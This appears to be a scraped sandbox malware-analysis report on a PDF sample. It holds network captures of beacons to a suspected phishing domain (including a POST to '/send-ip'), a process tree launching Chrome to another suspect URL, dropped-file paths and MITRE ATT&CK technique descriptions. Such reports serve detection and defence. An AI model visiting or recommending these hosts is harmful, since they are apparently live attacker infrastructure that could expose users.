2025-01-16 16:20:03 UTC	642	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 03 00 00 00 60 dc 09 b5 00 00 00 75 50 4c 54 45 b4 1f 30 3c 39 70 b4 1f 30 97 27 40 ff ff ff b4 1f 30 3c 3a 70 d0 73 7d 54 53 82 ec c7 cb e3 ab b1 61 5f 8b 48 46 79 6d 6b 94 49 46 79 be 3b 49 91 90 ae c2 c2 d2 79 78 9c 85 84 a6 48 47 79 9d 9c b7 aa a9 c0 b6 b5 c9 c7 57 64 f3 f3 f6 db da e4 ce cd db 96 26 40 e7 e7 ed 6d 6b 93 9e 9d b7 ce ce db a1 47 5e b5 b5 c9 9e 9c b8 c0 a4 b4 b7 87 9a ae 6c 81 d6 1f 19 b1 00 00 00 04 74 52 4e 53 df bf bf bf 3b 25 6a 12 00 00 01 b8 49 44 41 54 48 c7 8c d4 61 93 94 30 0c 06 60 d4 f5 35 9a 14 4b 69 41 38 d9 dd bb 53 ff ff 4f b4 79 b9 b9 ce c0 ce 68 3e 3c d3 81 09 34 a4 a1 fb f0 1f f1 e9 63 8b 0e 30 83 87 50 6d eb 76 e5 e7 e7 16 1d fa 69 10 bc 89 69 Data Ascii: PNGIHDR00`uPLTE0<9p0'@0<:ps}TSa_HFymkIFy;IyxHGyWd&@mkG^ltRNS;%jIDATHa0`5KiA8SOyh><4c0Pmvii

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:20:04 UTC	355	OUT	GET /favicon.ico HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:20:04 UTC	946	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:20:04 GMT Content-Type: image/x-icon Content-Length: 610 Connection: close X-Powered-By: Express Cache-Control: public, max-age=14400 Last-Modified: Tue, 07 Jan 2025 11:10:39 GMT ETag: W/"262-1944075a398" CF-Cache-Status: REVALIDATED Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=THITlDtM1tOFY5IyS5VQi4MYYZ1kkNgHx0gc%2BQCES5EnED5%2BuR3HrnUnQVqPSGBrrh5F34X1a7TEtx%2B1enxUtV%2B32jBACSx%2BNJqMgKW%2BlWr3RuYTe2h%2Fiqb8A2wpsmQPh0TD9yycuQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6e475adcc950-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13352&min_rtt=8205&rtt_var=6753&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=933&delivery_rate=355880&cwnd=32&unsent_bytes=0&cid=d1d8528781364dd2&ts=381&x=0"
2025-01-16 16:20:04 UTC	423	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 06 00 00 00 73 7a 7a f4 00 00 02 29 49 44 41 54 58 85 d5 97 3f 4c 1a 61 18 c6 7f 77 31 b0 1c 82 c9 0d 12 13 4b 53 89 9d 5a 18 ba 68 4d 8c 5d a4 8b ba d0 c1 10 b1 63 5d ba 52 17 16 db b9 31 76 a3 68 4c 17 bb c0 74 53 5b 5b aa 8b 83 d0 cd 48 83 31 69 5d 18 6c 64 b1 21 b1 03 70 70 78 fc b9 e3 e0 d2 67 e3 7b 73 f7 fc ee 7d bf ef 21 9f 40 4d d3 5b e3 c0 2e 30 05 0c d1 1f 95 81 43 20 c2 c1 da 39 80 50 35 0f 03 1f fa 68 ac 07 b2 cc c1 da 9e 50 fd f2 9f 03 34 6f 84 b8 27 52 69 fb a0 cd a9 7a ee 8a 54 66 6e 97 a6 44 ec f9 fa 9a 86 ba 32 f7 79 5d f8 46 87 35 6b fb c7 bf ac 21 e8 c6 3c 9b 7c 86 5b 72 e8 d6 d3 99 02 f1 f7 47 64 4f 8b a6 00 c4 76 45 8f e4 24 f5 26 d4 d2 1c 60 61 e6 2e fb 9b 8b Data Ascii: PNGIHDR szz)IDATX?Law1KSZhM]c]R1vhLtS[[H1i]ld!ppxg{s}!@M[.0C 9P5hP4o'RizTfnD2y]F5k!<\|[rGdOvE$&`a.
2025-01-16 16:20:04 UTC	187	IN	Data Raw: 61 00 43 23 68 de 64 d9 d3 a2 a6 23 66 d2 b0 e7 3d e0 69 13 d3 01 bf dc 71 6f 98 fe 2b f6 48 4e a2 4f ef 6b a2 3a db 90 8c db eb 4f d4 13 b3 a3 9c 10 dd f8 a4 fb 1e 81 e9 ad 9b 56 26 b3 c1 31 be 6c 2e 74 0d b5 14 53 48 65 0a 00 dc 7c 7f a1 a9 05 57 f7 74 73 c2 b2 63 b8 a3 9c a8 e6 7a 6a 95 92 3d 03 a4 33 05 96 62 ca ad 16 af be ae 07 d3 db 8f 3f 38 bb b8 d2 7d be ed 08 06 21 cb 46 f0 5f 03 94 6d f4 2f 8b 54 ee 6a 76 e9 50 04 22 d8 d3 85 32 10 11 ab b7 d4 e5 01 43 d4 2e a7 e7 82 ba 64 d3 f5 fc 1f 98 86 a2 c4 41 31 cb af 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: aC#hd#f=iqo+HNOk:OV&1l.tSHe\|Wtsczj=3b?8}!F_m/TjvP"2C.dA1IENDB`

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:21:14 UTC	586	OUT	POST /send-ip HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Origin: https://fixecondfirbook.info Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://fixecondfirbook.info/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:21:14 UTC	824	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 16:21:14 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cmJjjW%2BqDMC7LLu7atnCglb1P%2FEBqw4zyQr8oXOowr8VOd0fB2fdajMQW0tExmSSgnWfOgDAIFHkZP%2Bi8IoALgf2fUFYtPPybfO%2FMnbcfqarm0ZnfZNdlkgzj5ulyrVm72ztxzoZQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f6ffe2f24aaec-YYZ alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13767&min_rtt=13767&rtt_var=5164&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=1164&delivery_rate=211993&cwnd=32&unsent_bytes=0&cid=4621eb35ad8c21bc&ts=495&x=0"
2025-01-16 16:21:14 UTC	27	IN	Data Raw: 31 35 0d 0a 49 50 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd 0d 0a Data Ascii: 15IP
2025-01-16 16:21:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iRMbIIEjhP.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Errors

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\7cbd422c-0b6a-45e1-9d7d-f43fee1ab856.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250116161938Z-308.bmp

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

Windows Analysis Report
iRMbIIEjhP.pdf

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:21:15 UTC	351	OUT	GET /send-ip HTTP/1.1 Host: fixecondfirbook.info Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:21:15 UTC	900	IN	HTTP/1.1 404 Not Found Date: Thu, 16 Jan 2025 16:21:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Powered-By: Express Content-Security-Policy: default-src 'none' X-Content-Type-Options: nosniff cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SLfPgUYdPex1mDGZoBoIwG9MCK2Kiv2nLkIMNZUIGzYXfiWgs2pNc1xr4ght6QJZa6Vs7TcOPei3anbGU9SlRye4B0hXpVlgFarjkw7L9OTmqvxqm4rDPiEP6pis1W53%2FAHCbGGSSA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 902f700428c981c9-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7271&min_rtt=7238&rtt_var=2781&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=929&delivery_rate=388918&cwnd=32&unsent_bytes=0&cid=5d04959f7e27764e&ts=376&x=0"
2025-01-16 16:21:15 UTC	152	IN	Data Raw: 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 73 65 6e 64 2d 69 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: 92<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /send-ip</pre></body></html>
2025-01-16 16:21:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:21:16 UTC	547	OUT	OPTIONS /report/v4?s=SLfPgUYdPex1mDGZoBoIwG9MCK2Kiv2nLkIMNZUIGzYXfiWgs2pNc1xr4ght6QJZa6Vs7TcOPei3anbGU9SlRye4B0hXpVlgFarjkw7L9OTmqvxqm4rDPiEP6pis1W53%2FAHCbGGSSA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fixecondfirbook.info Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:21:16 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: OPTIONS, POST access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Thu, 16 Jan 2025 16:21:16 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2025-01-16 16:21:16 UTC	484	OUT	POST /report/v4?s=SLfPgUYdPex1mDGZoBoIwG9MCK2Kiv2nLkIMNZUIGzYXfiWgs2pNc1xr4ght6QJZa6Vs7TcOPei3anbGU9SlRye4B0hXpVlgFarjkw7L9OTmqvxqm4rDPiEP6pis1W53%2FAHCbGGSSA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 397 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-16 16:21:16 UTC	397	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 38 34 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 39 34 2e 31 39 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 66 69 78 65 63 6f 6e 64 66 69 72 62 6f 6f 6b 2e Data Ascii: [{"age":0,"body":{"elapsed_time":841,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.94.195","status_code":404,"type":"http.error"},"type":"network-error","url":"https://fixecondfirbook.
2025-01-16 16:21:16 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Thu, 16 Jan 2025 16:21:16 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	1
Start time:	11:19:26
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\iRMbIIEjhP.pdf"
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	11:19:32
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	5
Start time:	11:19:34
Start date:	16/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2132 --field-trial-handle=1508,i,8264622678138486168,971824510613183442,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	8
Start time:	11:19:53
Start date:	16/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://clintonmakes.com/215c/#7ihbo"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	11:19:54
Start date:	16/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2520,i,9976915525274287468,7701415393893872558,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre